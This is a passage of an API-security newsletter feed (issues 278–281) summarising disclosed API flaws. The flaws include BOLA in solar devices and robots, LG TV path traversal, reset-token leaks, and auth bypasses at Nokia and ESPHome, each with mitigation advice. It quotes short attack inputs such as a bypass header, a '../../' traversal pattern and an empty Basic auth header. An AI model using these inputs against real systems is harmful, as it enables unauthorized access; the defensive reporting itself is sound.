<p style="font-weight: 400;"><span style="font-weight: 400;">Hackers use mass assignment to exploit hidden features or logic flaws in API code, which can be harder for some security tools to detect than other input-based API attacks like SQL injection or path traversal.  OWASP </span><a href="https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/" target="_blank" rel="noopener"><span style="font-weight: 400;">recommends</span></a><span style="font-weight: 400;"> whitelisting allowed API properties and enforcing strict schema validation to prevent these vulnerabilities from being exploited. </span><a href="https://cybersecuritynews.com/suse-rancher-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Data Exposure from Apache Airflow API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">If Mass Assignment is one side of OWASP’s Broken Object Property Level Authorization (BOPLA), then Excessive Data Exposure is the other. Both deal with APIs’ data properties:  Mass Assignment concerns unauthorized use of request properties, while Excessive Data Exposure involves unauthorized access to response properties.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A vulnerability recently found in Apache Airflow highlights the latter. A software update unintentionally reversed existing authorization controls, exposing sensitive information in API responses. Users with only </span><i><span style="font-weight: 400;">Read</span></i><span style="font-weight: 400;"> permissions could suddenly view secrets such as passwords and tokens that should have been hidden.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Just as OWASP advises whitelisting request properties to prevent Mass Assignment (see the previous article), the same security recommendation applies to API responses: enforce strict response schemas so that only authorized properties are returned.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Organizations can also apply </span><b>API drift testing</b><span style="font-weight: 400;"> to detect when a production API’s behavior deviates from expectations, whether due to code regressions, misconfigurations, or overlooked security changes. </span><a href="https://cybersecuritynews.com/apache-airflow-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Nokia Auth Bypass via Malicious API Header</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API vulnerability in two Nokia networking platforms, Nokia CBIS and Nokia Container Services, allows any user to bypass authentication and gain unauthorized access to management API services.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent Cyberpress article describes details of the vulnerability, caused by a logic error in the API’s authentication code and the way user-supplied HTTP headers are handled.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">During the authentication sequence, custom headers in the API request are parsed. Depending on their value, the flawed logic can route requests around the authentication check, giving unauthenticated users access to privileged management services on either platform.</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Exploitation requires sending HTTP requests with a header, for example X-Auth-Bypass: &lt;token&gt;, to management API endpoints.”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Nokia resolved the vulnerability by enforcing strict header validation and mandating mutual TLS for management API calls. These security controls, properly implemented, can significantly reduce the opportunity for attackers to exploit and breach APIs. </span><a href="https://cyberpress.org/nokia-api-authentication-bypass/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<p>The post <a href="https://apisecurity.io/issue-281-onelogin-leaks-secrets-cloudflare-api-dos-entra-id-flaw-owasp-bopla-bugs/">Issue 281: OneLogin leaks secrets, Cloudflare API DoS, Entra ID flaw, OWASP BOPLA bugs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 280: Solar device ATO attacks, Smart TVs &#038; Dumb APIs, Password-reset &#038; API bugs, 2025 Developer Survey</title>
		<link>https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Sep 2025 13:27:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11385</guid>

					<description><![CDATA[<p>This week, we examine an industry report uncovering critical API vulnerabilities in solar power devices, and a recent case of API directory traversal flaws affecting LG Smart TVs. We also look at common weaknesses in the APIs for password-reset services, and finally review insights from the latest Stack Overflow Developer Survey on what developers are [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/">Issue 280: Solar device ATO attacks, Smart TVs &#038; Dumb APIs, Password-reset &#038; API bugs, 2025 Developer Survey</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we examine an industry report uncovering critical API vulnerabilities in solar power devices, and a recent case of API directory traversal flaws affecting LG Smart TVs. We also look at common weaknesses in the APIs for password-reset services, and finally review insights from the latest Stack Overflow Developer Survey on what developers are saying about AI.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Major API Flaws in Solar Power Systems</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Many API incidents that we cover in this newsletter involve traditional clients like business apps and SaaS platforms using broken or vulnerable APIs. But APIs now underpin integrations and connectivity for everything from industrial power plants to smart home devices. As a result, API vulnerabilities are surfacing across more industries, though often in very similar ways.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Forescout’s report on solar power platforms is an eye-opening example. It uncovers multiple critical risks in industrial and home systems, many tied to API security. Part 2 of the report, “Growatt Vulnerability Details,” is particularly worth a read.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Many of the API vulnerabilities stem from missing object or resource-level authorization. In one example, a malicious user could remove ownership of a home device from a legitimate user, and allow the malicious user to take ownership and control of the device. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The flawed API accepts a device ID <span style="color: #008000;">(</span></span><span style="font-weight: 400; color: #008000;">devId)</span><span style="font-weight: 400;"> parameter without verifying whether the current (malicious) user is authorized for that device, a textbook case of Broken Object Level Authorization (BOLA).</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11386" src="https://apisecurity.io/wp-content/uploads/2025/09/Flaws_in_Solar_Power_Systems_Image1-300x83.png" alt="" width="799" height="221" srcset="https://apisecurity.io/wp-content/uploads/2025/09/Flaws_in_Solar_Power_Systems_Image1-300x83.png 300w, https://apisecurity.io/wp-content/uploads/2025/09/Flaws_in_Solar_Power_Systems_Image1-1024x282.png 1024w, https://apisecurity.io/wp-content/uploads/2025/09/Flaws_in_Solar_Power_Systems_Image1-768x211.png 768w, https://apisecurity.io/wp-content/uploads/2025/09/Flaws_in_Solar_Power_Systems_Image1.png 1468w" sizes="auto, (max-width: 799px) 100vw, 799px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report outlines multiple instances of BOLA/IDOR vulnerabilities in the Growatt solar power system. And as we’ve seen in our own research recently, BOLA is one of the most pervasive API flaws, showing up everywhere from India’s Government Tax portal to McDonald’s recruitment software, and in service robots used in hospitals and restaurants. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Other API vulnerabilities documented in the report include an XSS flaw, where an API accepts a malicious script injected into a request property (“name”), without proper validation. And another involves a vulnerable password-reset service, where the underlying API exposes the email address of registered users on the platform to unauthenticated users. Plenty of valuable API security lessons to be learned. </span><a href="https://www.forescout.com/resources/sun-down-research-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: LG Smart TVs with Dumb API Bugs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another novel API security incident, this time in LG Smart TVs. The TV supports an API to allow connected devices download files from a specific folder or directory on the TV system.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The API defined a query parameter ‘getFile’ to allow a connecting device to indicate which directory in the TV system to grab files from: </span><i><span style="font-weight: 400;">/tmp/usb</span></i><span style="font-weight: 400;"> or </span><i><span style="font-weight: 400;">/tmp/home.office.documentviewer</span></i><span style="font-weight: 400;">. But the API failed to validate the value of the getFile parameter.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11387" src="https://apisecurity.io/wp-content/uploads/2025/09/LG_Smart_TV-300x125.png" alt="" width="799" height="333" srcset="https://apisecurity.io/wp-content/uploads/2025/09/LG_Smart_TV-300x125.png 300w, https://apisecurity.io/wp-content/uploads/2025/09/LG_Smart_TV-768x321.png 768w, https://apisecurity.io/wp-content/uploads/2025/09/LG_Smart_TV.png 1024w" sizes="auto, (max-width: 799px) 100vw, 799px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By failing to constrain the value, it gives an attacker space to attack the system through the API. A pattern that frequently works, and is well documented, is a directory traversal pattern: “../../”, which allows a hacker to trick an API into giving unauthorized access to sensitive directories and files, including credentials and access tokens that can lead to a full system takeover.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These are very common attacks against APIs that accept file paths and URLS as input. So again one to watch out for. </span><a href="https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: AI Agent platform Exposing ATO Risk</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers recently discovered a vulnerability in Flowise, a platform for building AI agents, that exposed users to account takeover (ATO). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue is related to the password reset API. Normally, these services validate requests by sending a reset link and temporary token to the user’s registered email address, ensuring only someone with access to that inbox can reset the password. But in this case, the API returned the reset token directly in the response payload. That meant an attacker could reset another user’s password without needing their email account.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Flowise team has since </span><a href="https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863" target="_blank" rel="noopener"><span style="font-weight: 400;">fixed</span></a><span style="font-weight: 400;"> the issue by removing sensitive data like the token from the response. It’s a strong reminder that teams should carefully document and control API response data to avoid leaking sensitive information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Password reset endpoints are a recurring weak spot. One of the Growatt solar power vulnerabilities mentioned earlier in this issue also involved a reset service, and we’ve covered similar cases in this newsletter: </span><a href="https://apisecurity.io/issue-275-api-hackers-strike-gold-malicious-api-drift-at-coinmarketcap-survey-reveals-major-api-security-gaps/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue 275</span></a><span style="font-weight: 400;"> “How to Avoid Password Reset Poisoning”, and </span><a href="https://apisecurity.io/issue-266-api-governance-kyc-leak-at-the-post-office-sql-injection-bug-in-fintech-api-api-best-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue 266</span></a><span style="font-weight: 400;"> “Authorization Bug in Gitlab Password Reset API”. So these are services and APIs you should review closely for similar vulnerabilities. </span><a href="https://gbhackers.com/flowiseai-password-reset-token-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Article: Developer Survey Reveals AI Usage </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Stack Overflow team has released its 2025 Developer Survey, and it makes for an interesting and insightful read about developer trends and challenges. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Unsurprisingly, AI, and its discontents, features prominently in the survey this year. Some of the responses reveal both the opportunities and the downsides from using AI.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The highest percentage of developers report a lack of trust in AI’s accuracy, especially for complex or high-stakes tasks such as deploying software, monitoring systems, or conducting code reviews. AI tools are viewed more positively for learning or quick information retrieval, which probably aligns with most people&#8217;s AI experience.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The most consistent pain point emerging from the survey is that AI-generated output is rarely precise, and often requires rework. Debugging unfamiliar code produced by AI occupies a lot of time, undermining the efficiency gains developers hope for.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11388" src="https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-300x161.png" alt="" width="798" height="428" srcset="https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-300x161.png 300w, https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-1024x550.png 1024w, https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-768x413.png 768w, https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-1536x826.png 1536w, https://apisecurity.io/wp-content/uploads/2025/09/stackoverflow-dev-survey-2025-ai-developer-tools-ai-frustration-social-2048x1101.png 2048w" sizes="auto, (max-width: 798px) 100vw, 798px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of these findings from professional developers match concerns about using AI in API security. While AI tools are helpful for routine tasks, critical processes still demand a human-in-the-loop to validate AI-generated outputs. Though this safeguard limits some of the key benefits AI promises: speed and scalability through full automation. </span><a href="https://survey.stackoverflow.co/2025/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a></p>
<p>The post <a href="https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/">Issue 280: Solar device ATO attacks, Smart TVs &#038; Dumb APIs, Password-reset &#038; API bugs, 2025 Developer Survey</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 279: Tax records leak, Hacked service robots, Frostbyte at US stores, Layer 7 API attacks</title>
		<link>https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 04 Sep 2025 22:59:24 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11376</guid>

					<description><![CDATA[<p>This week, we share API security incidents from across different industries, highlighting the common vulnerabilities that continue to surface, from government web portals and security platforms to industrial equipment, home devices, and even service robots at your local restaurant. Vulnerability: Tax Records Leak with API IDOR Flaw Researcher Aseem Shrey disclosed an Insecure Direct Object [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/">Issue 279: Tax records leak, Hacked service robots, Frostbyte at US stores, Layer 7 API attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we share API security incidents from across different industries, highlighting the common vulnerabilities that continue to surface, from government web portals and security platforms to industrial equipment, home devices, and even service robots at your local restaurant.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Tax Records Leak with API IDOR Flaw</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researcher Aseem Shrey disclosed an Insecure Direct Object Reference (IDOR) vulnerability in India’s Goods and Services Tax portal that exposed sensitive taxpayer records. He noticed that the web portal retrieves tax payment data through an API request, and that the request includes a receipt ID. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This often prompts a hacker to check if by changing a resource ID value can they access other users’ information. The fact that BOLA/IDOR is at the top of the OWASP API Top 10 vulnerability list suggests the answer is often a resounding yes! </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case,the API failed to verify that the current user is authorized to access a specific record, or object and so any user logged into the system could access any other tax payment record by simply changing the receipt ID.  This single API flaw risked exposing financial information of 11.8 million Indian taxpayers and companies.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs handling sensitive records must enforce strict object-level authorization and avoid exposing predictable IDs to prevent this type of vulnerability. </span><a href="https://aseem-shrey.medium.com/manipulating-indias-stock-market-the-gst-portal-data-leak-b5437c817071" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Fleet of Pedu Robots vulnerable to BOLA</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another BOLA flaw to report, this time in the robot management APIs for a large Chinese robotics vendor. You’ve probably seen similar robots serving food or drinks in restaurants. Now apparently they’re also deployed at hospitals, offices, and retail stores. All controlled by Skynet (just kidding). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A researcher demonstrated how API calls to control robots and change settings could be executed without proper authorization. While the APIs required an access token, no object-level checks were enforced. Once again, by manipulating identifiers in the payload, attackers could take remote control of robots they didn’t own, creating risks of physical harm, sabotage, or surveillance.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This highlights yet again why testing for BOLA vulnerabilities and enforcing strict object-level authorization must be a top priority for API teams. </span><a href="https://bobdahacker.com/blog/hacked-biggest-chinese-robot-company" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Layer 7 DoS Vulnerability in Hashicorp Vault</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">When people hear of Denial of service (DoS) attacks, they think of floods of traffic overwhelming a service. But APIs expose other ways for threat actors to knock out a service.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In August, Hashicorp Vault, a security platform for managing secrets and credentials, was itself found to be susceptible to a DoS attack when processing certain malformed API requests. Attackers could repeatedly trigger the issue to disrupt availability of the platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Hackers can use malformed payloads to exploit JSON processing with various tricks, using complex data structures, oversized strings, or patterns that overload server-side components. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Teams can mitigate the risk from application-layer (layer7) DoS attacks by enforcing strict request validation: limit payload size and complexity, reject undocumented properties, and constrain user-supplied input to only what the API actually needs. </span><a href="https://cybersecuritynews.com/hashicorp-vault-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: US Grocery Stores Vulnerable to API Attacks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Emphasizing again the importance of input validation, another report of multiple API vulnerabilities in Copeland refrigeration systems, including a layer 7 DoS vulnerability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Copeland refrigerators are widely used in grocery stores across the U.S., and could be remotely controlled through APIs to change settings and temperatures, with obvious potential for disruption and damage.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the APIs lacked input validation, allowing the researchers to crash the service with a malformed API request and trigger a DoS attack. Other issues included excessive data exposure, where APIs returned sensitive information such as password hashes, and insecure endpoints that allowed remote activation of critical OS services like SSH and Shellinabox.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs are everywhere, but the same design flaws surface time and again. Broken object-level authorization and weak data validation remain among the most common and dangerous API vulnerabilities across industries. </span><a href="https://www.theregister.com/2025/09/02/frostbyte10_copeland_controller_bugs/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Privilege Escalation Flaw in Security Platform</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Even security platforms can ship with serious API flaws. A recent report outlines multiple vulnerabilities in Securden’s Privilege Account Management (PAM) solution, exposing it to authorization bypass and, ironically, privilege escalation attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One flaw stemmed from an endpoint that issued session cookies without requiring authentication. Those cookies could then be used to obtain a CSRF token and a secondary cookie, granting access to the API. Because the API failed to verify whether the cookies actually belonged to an authenticated user, attackers could bypass authentication altogether, demonstrating a case of </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/" target="_blank" rel="noopener"><span style="font-weight: 400;">broken authentication</span></a><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In another case, an API allowed unauthenticated users to invoke privileged admin services, including backing up encrypted passwords to an attacker-controlled location. This highlights the need for strict function-level authorization checks, ensuring only users with the right roles and permissions can access sensitive operations. </span><a href="https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: Broken Auth Exposes ESPHome Devices</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">ESPHome, an open-source technology widely used for IoT automation, was found to contain an authentication bypass in its embedded web server. The flaw allowed attackers to send API requests without credentials and control connected devices, putting homes and offices at risk.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A review of the code change in the ESPHome project shows the issue originated from a logic error in the authenticate function. Instead of validating full credentials, the function based the validation process on the length of the user-supplied credential.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11382" src="https://apisecurity.io/wp-content/uploads/2025/09/279_ESPN-home-flaw-300x71.png" alt="" width="896" height="212" srcset="https://apisecurity.io/wp-content/uploads/2025/09/279_ESPN-home-flaw-300x71.png 300w, https://apisecurity.io/wp-content/uploads/2025/09/279_ESPN-home-flaw-1024x242.png 1024w, https://apisecurity.io/wp-content/uploads/2025/09/279_ESPN-home-flaw-768x182.png 768w, https://apisecurity.io/wp-content/uploads/2025/09/279_ESPN-home-flaw.png 1180w" sizes="auto, (max-width: 896px) 100vw, 896px" /></p>
<p style="font-weight: 400;"><a href="https://github.com/esphome/esphome/compare/2025.8.0...2025.8.1" target="_blank" rel="noopener"><i><span style="font-weight: 400;">ESPhome source code on Github</span></i></a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This meant an attacker could manipulate how the authenticate function works. In fact, by sending an empty </span><span style="font-weight: 400; color: #00ccff;">Authorization: Basic</span><span style="font-weight: 400;"> header (so a length of zero), authentication was completely bypassed. </span></p>
<p><span style="font-weight: 400;">This case highlights the importance of pre-production security testing, particularly around authentication and authorization. Automated identity and access control scans can help catch subtle flaws like this before threat actors find them. </span><a style="font-weight: 400;" href="https://cybersecuritynews.com/esphome-web-server-authentication-bypass" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a></p>
<p>The post <a href="https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/">Issue 279: Tax records leak, Hacked service robots, Frostbyte at US stores, Layer 7 API attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 278: OWASP API Bugs at Intel, TeaForHer, &#038; McDonald’s, Optus Breach Fallout, APIs for AI Agents</title>
		<link>https://apisecurity.io/issue-278-owasp-api-bugs-at-intel-teaforher-mcdonalds-optus-breach-fallout-apis-for-ai-agents/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Aug 2025 15:05:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11363</guid>

					<description><![CDATA[<p>This week, we dive into detailed reports of vulnerabilities impacting Intel, McDonald’s, and the social media app TeaForHer, each with valuable lessons for API security. We also look at the latest news and rising costs from the Optus 2022 API breach. Finally, we highlight an insightful article offering practical tips for designing APIs for efficient [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-278-owasp-api-bugs-at-intel-teaforher-mcdonalds-optus-breach-fallout-apis-for-ai-agents/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-278-owasp-api-bugs-at-intel-teaforher-mcdonalds-optus-breach-fallout-apis-for-ai-agents/">Issue 278: OWASP API Bugs at Intel, TeaForHer, &#038; McDonald’s, Optus Breach Fallout, APIs for AI Agents</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">T</span><span style="font-weight: 400;">his week, we dive into detailed reports of vulnerabilities impacting Intel, McDonald’s, and the social media app TeaForHer, each with valuable lessons for API security. We also look at the latest news and rising costs from the Optus 2022 API breach. Finally, we highlight an insightful article offering practical tips for designing APIs for efficient AI agent consumption.</span></p>
<p><span style="font-weight: 400;">Before we dive in this week, </span><b>a big thank you </b><span style="font-weight: 400;">to everyone who dropped by the 42Crunch booth at Black Hat USA earlier this month and shared your thoughts on the APISecurity.io newsletter.</span></p>
<p><span style="font-weight: 400;">Hearing your feedback was very encouraging, especially stories from teams using lessons learned from API breaches to improve your own API development. That is exactly why we do this, and so very gratifying to get that feedback! </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API flaws behind Intel websites</span></h2>
<p><span style="font-weight: 400;">I came across a recent </span><a href="https://eaton-works.com/2025/08/18/intel-outside-hack/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> on eaton-works describing multiple API bugs exposing Intel&#8217;s internal websites to breaches and corporate data leaks. </span></p>
<p><span style="font-weight: 400;">From this case alone I noted at least four OWASP API Top 10 vulnerabilities. But the bigger lesson is one we see repeatedly in API incidents: a dangerous tendency to confuse client-side security with server-side security, and it’s the server-side API teams who are negligent.</span></p>
<p><span style="font-weight: 400;">APIs should always be built and tested under the assumption that attackers will target them directly. Even if an APIs is intended for use only by your own website or apps, hackers can bypass client-side checks, and ‘curl’ their way to your APIs. That’s why authentication, authorization, and request/response validation must be enforced on the server-side, regardless of what checks or constraints the website or app frontend enforces.</span></p>
<p><span style="font-weight: 400;">The vulnerabilities I noted in the article include: </span><b></b></p>
<ul>
<li aria-level="1"><b>API2:2023  Broken Authentication</b></li>
</ul>
<ul>
<li aria-level="1"><b>API3:2023  Broken Object Property Level Authorization </b></li>
</ul>
<ul>
<li aria-level="1"><b>API4:2023  Unrestricted Resource Consumption</b></li>
</ul>
<ul>
<li aria-level="1"><b>API5:2023  Broken Functional Level Authorization</b></li>
</ul>
<p><span style="font-weight: 400;">Did you spot others? </span></p>
<h2><span style="font-weight: 400;">Article: Headaches continue for Optus’ 2022 API breach</span></h2>
<p><span style="font-weight: 400;">Australian telecommunications group Optus is back in the </span><a href="https://thecyberexpress.com/civil-penalty-over-2022-optus-data-breach/" target="_blank" rel="noopener"><span style="font-weight: 400;">news</span></a><span style="font-weight: 400;"> this month over its 2022 API breach, which exposed the personal information of more than 9 million customers. Three years later, the reputational damage and financial costs are still mounting. </span></p>
<p><span style="font-weight: 400;">We first covered the breach in </span><a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/" target="_blank" rel="noopener"><span style="font-weight: 400;">2022</span></a><span style="font-weight: 400;">, and again in </span><a href="https://apisecurity.io/issue-249-major-api-breach-at-optus-cocoapods-exposed-bad-bots-and-api-dos-attacks-webinar-2024-api-breaches/" target="_blank" rel="noopener"><span style="font-weight: 400;">2024</span></a><span style="font-weight: 400;"> when a third-party investigation revealed the root cause as a coding error in an unused API. Optus had previously identified the same flaw and patched it on one endpoint, but failed to apply the fix consistently, leaving the exploited API unprotected.</span></p>
<p><span style="font-weight: 400;">Now, the Australia Information Commissioner, the national data protection agency, is seeking penalties against Optus for negligence in failing to adequately protect customer information. </span></p>
<p style="text-align: center;"><i><span style="font-weight: 400;">“All organisations holding personal information need to ensure they have strong data governance and security practices.”</span></i></p>
<p><span style="font-weight: 400;">Effective governance in this case means maintaining an accurate API inventory, and crucially bringing every API under proper security and lifecycle management controls, making sure to decommission APIs that are no longer in use. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API docs expose TeaOnHer users private data</span></h2>
<p><span style="font-weight: 400;">TechCrunch researchers </span><a href="https://techcrunch.com/2025/08/13/how-we-found-teaonher-spilling-users-drivers-licenses-in-less-than-10-minutes/" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> API flaws in the gossip app TeaOnHer that exposed users&#8217; personal information, including photos of driver licenses, without requiring authentication.</span></p>
<p><span style="font-weight: 400;">The app developer, maybe accidentally, published API documentation that defined both user </span><i><span style="font-weight: 400;">and</span></i><span style="font-weight: 400;"> admin API endpoints. Crucially, some of the endpoints did not enforce authentication, so anyone on the internet could call the APIs to retrieve user information, including contact details, private comments, or photos of a user’s driver’s license. </span></p>
<p><span style="font-weight: 400;">Notably, even though this case involved a sole developer, it was the same mistake in API security also at the root of breaches at large organizations like Optus and Intel: failing to enforce authentication. It shows there’s a recurring security gap that cuts across API teams of any size. As a security practice, it is crucial to document which APIs require authentication, and then regularly test or scan them to verify authentication controls are in place and effective. </span></p>
<h2><span style="font-weight: 400;">Article: Tips on designing APIs for AI </span></h2>
<p><span style="font-weight: 400;">One of the emerging requirements for safely integrating AI agents with external tools and services is precision in API design. There are two main drivers for this: security and integration.</span></p>
<p><span style="font-weight: 400;">On the security side, precise design and constraints in the API implementation helps reduce the risk of AI agents misusing or abusing APIs. For example, enforcing strict access controls and validating agent-supplied inputs against allowed structures, formats, and values, helps establish guardrails that prevent unintended or harmful API behavior, even when AI agents behave unexpectedly.</span></p>
